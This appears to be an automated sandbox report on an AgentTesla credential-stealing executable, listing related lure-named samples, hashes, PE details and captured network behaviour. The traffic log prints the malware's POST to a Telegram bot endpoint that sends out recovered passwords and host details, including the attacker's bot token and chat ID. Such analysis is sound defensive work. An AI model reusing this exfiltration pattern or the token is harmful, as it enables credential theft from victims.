op9GwJXEM8.exe | malicious | 149.154.167.99
op9GwJXEM8.exe | malicious | 149.154.167.99
hSNPFOpBGX.exe | malicious | 149.154.167.220
RifGjmcXrZ.exe | malicious | 149.154.167.99
dCDK0fokGD.exe | malicious | 149.154.167.99
UYnxVWnBmO.exe | malicious | 149.154.167.99
RifGjmcXrZ.exe | malicious | 149.154.167.99
dCDK0fokGD.exe | malicious | 149.154.167.99
UYnxVWnBmO.exe | malicious | 149.154.167.99
PR-007493 PR-007495.exe | malicious | 149.154.167.220
N9FpyeJiD6.exe | malicious | 149.154.167.220
0IuRlVUH6L.exe | malicious | 149.154.167.99
CMkPFGn9Ur.exe | malicious | 149.154.167.99

                                                                                                JA3 Fingerprints

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Context
calc.exe | malicious | 149.154.167.220
calc.exe | malicious | 149.154.167.220
j1XcBWNHwh.exe | malicious | 149.154.167.220
DHL_Shipment_Notification.exe | malicious | 149.154.167.220
mxZECDzIFz.exe | malicious | 149.154.167.220
RFQ TESDA PROJECT.exe | malicious | 149.154.167.220
IB5eMmKwbD.exe | malicious | 149.154.167.220
DHL_waybill20212810.exe | malicious | 149.154.167.220
r18qGHf6vL.exe | malicious | 149.154.167.220
PR-007493 PR-007495.exe | malicious | 149.154.167.220
Software updated by Dylox.exe | malicious | 149.154.167.220
open this if the doesn't work.exe | malicious | 149.154.167.220
hSNPFOpBGX.exe | malicious | 149.154.167.220
XoPspkwdql.exe | malicious | 149.154.167.220
jamDpbFXfr.exe | malicious | 149.154.167.220
SOkQ2u6sxV.exe | malicious | 149.154.167.220
PR-007493 PR-007495.exe | malicious | 149.154.167.220
INVOICE 003.pdf.exe | malicious | 149.154.167.220
Genshin Hack v2.0.exe | malicious | 149.154.167.220
Fortnite Hack Mod v1.4.exe | malicious | 149.154.167.220

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\remmittance copy.exe.log
                                                                                                Process:C:\Users\user\Desktop\remmittance copy.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.355304211458859
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.785452544359051
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:remmittance copy.exe
                                                                                                File size:422912
                                                                                                MD5:c039d3d94f0cc82369c066e26a67e0f6
                                                                                                SHA1:79519d3cbee4d7af49cf1572ed9a5fa87b2186fe
                                                                                                SHA256:219816561a364b4e85a344de1a4d7c7f74a01068f9a51bbb7e3101c9c9dd05ac
                                                                                                SHA512:96cb04fd36b5fa9bdfbdc1c37b04595333e96bdd55f50f21623c9418c46a7000d93afbe0ee40ab71f4813df515cf6fd6ec22f4b6216a124ac1af5be769bf55f1
                                                                                                SSDEEP:12288:kdQ8VS/EtO86ljk/nqS48szz1sUTT5Knwv:F/SLPc8s/CUTo
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ya..............0..d...........Q... ........@.. ....................................@................................

                                                                                                File Icon

                                                                                                Icon Hash:070717131b3d0636

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x4651e6
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0x6179F1C8 [Thu Oct 28 00:41:44 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add dword ptr [ecx], eax
add dword ptr [ecx], eax
add dword ptr [ecx], eax
add dword ptr [ecx], eax
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add eax, dword ptr [eax]
add byte ptr [eax], al
pop es
add byte ptr [eax], al
add byte ptr [edi], cl
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [edi], bh
add byte ptr [eax], al
add byte ptr [edi+00h], bh
add byte ptr [eax], al
inc dword ptr [eax]
add byte ptr [eax], al
inc dword ptr [ecx]
add byte ptr [eax], al
inc dword ptr [ebx]
add byte ptr [eax], al
inc dword ptr [edi]
add byte ptr [eax], al
dec dword ptr [edi]
add byte ptr [eax], al
call far fword ptr [edi]
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x65194 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6a000 | 0xae0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x663ec | 0x66400 | False | 0.901651321822 | data | 7.80880242174 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x6a000 | 0xae0 | 0xc00 | False | 0.343098958333 | data | 3.55581915248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x6a120 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x6a258 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 133658375, next used block 4294967167 | |
RT_GROUP_ICON | 0x6a550 | 0x22 | data | |
RT_VERSION | 0x6a584 | 0x35c | data | |
RT_MANIFEST | 0x6a8f0 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | 1999 Nissan R 390 GT1
Assembly Version | 6.0.0.0
InternalName | FlushWriteAsyncd.exe
FileVersion | 6.0.0.0
CompanyName |
LegalTrademarks |
Comments | Nissan R
ProductName | ShallowBlue
ProductVersion | 6.0.0.0
FileDescription | ShallowBlue
OriginalFilename | FlushWriteAsyncd.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2021 07:41:03.979334116 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:03.979391098 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:03.979553938 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:04.065499067 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:04.065516949 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:04.134464025 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:04.134577990 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:04.141242981 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:04.141258955 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:04.141453028 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:04.195493937 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:05.370065928 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:05.397603989 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:05.400892973 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:05.444885969 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:05.497457027 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:05.497586012 CEST | 443 | 49848 | 149.154.167.220 | 192.168.2.4
Oct 28, 2021 07:41:05.498500109 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220
Oct 28, 2021 07:41:05.499964952 CEST | 49848 | 443 | 192.168.2.4 | 149.154.167.220

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2021 07:41:03.827276945 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Oct 28, 2021 07:41:03.846417904 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 28, 2021 07:41:03.827276945 CEST | 192.168.2.4 | 8.8.8.8 | 0xcc1f | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 28, 2021 07:41:03.846417904 CEST | 8.8.8.8 | 192.168.2.4 | 0xcc1f | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• api.telegram.org

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49848 | 149.154.167.220 | 443 | C:\Users\user\Desktop\remmittance copy.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 05:41:05 UTC | 0 | OUT | POST /bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8d999ffec9f8e5b
Host: api.telegram.org
Content-Length: 1004
Expect: 100-continue
Connection: Keep-Alive
2021-10-28 05:41:05 UTC | 0 | IN | HTTP/1.1 100 Continue
2021-10-28 05:41:05 UTC | 0 | OUT | Data Ascii: -----------------------------8d999ffec9f8e5bContent-Disposition: form-data; name="chat_id"1373897190-----------------------------8d999ffec9f8e5bContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/445817OSFull
2021-10-28 05:41:05 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 28 Oct 2021 05:41:05 GMT
Content-Type: application/json
Content-Length: 609
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":1761,"from":{"id":1975237880,"is_bot":true,"first_name":"yuvtrss","username":"yuvtrss_bot"},"chat":{"id":1373897190,"first_name":"slims","last_name":"Negro","type":"private"},"date":1635399665,"document":{"file_name":"user-445817 2021-10-28 10-44-31.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIG4WF6N_EcEQ1oaOqhOFUXIJAuTS_JAAJzCAAConzQUwL6qliOM8dTIQQ","file_unique_id":"AgADcwgAAqJ80FM","file_size":434},"caption":"New PW Recovered!\n\nUser Name: user/445817\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Behavior

System Behavior

General

Start time: 07:39:08
Start date: 28/10/2021
Path: C:\Users\user\Desktop\remmittance copy.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\remmittance copy.exe'
Imagebase: 0x6b0000
File size: 422912 bytes
MD5 hash: C039D3D94F0CC82369C066E26A67E0F6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 07:39:15
Start date: 28/10/2021
Path: C:\Users\user\Desktop\remmittance copy.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\remmittance copy.exe
Imagebase: 0x140000
File size: 422912 bytes
MD5 hash: C039D3D94F0CC82369C066E26A67E0F6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 07:39:16
Start date: 28/10/2021
Path: C:\Users\user\Desktop\remmittance copy.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\remmittance copy.exe
Imagebase: 0xc20000
File size: 422912 bytes
MD5 hash: C039D3D94F0CC82369C066E26A67E0F6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

Disassembly

Code Analysis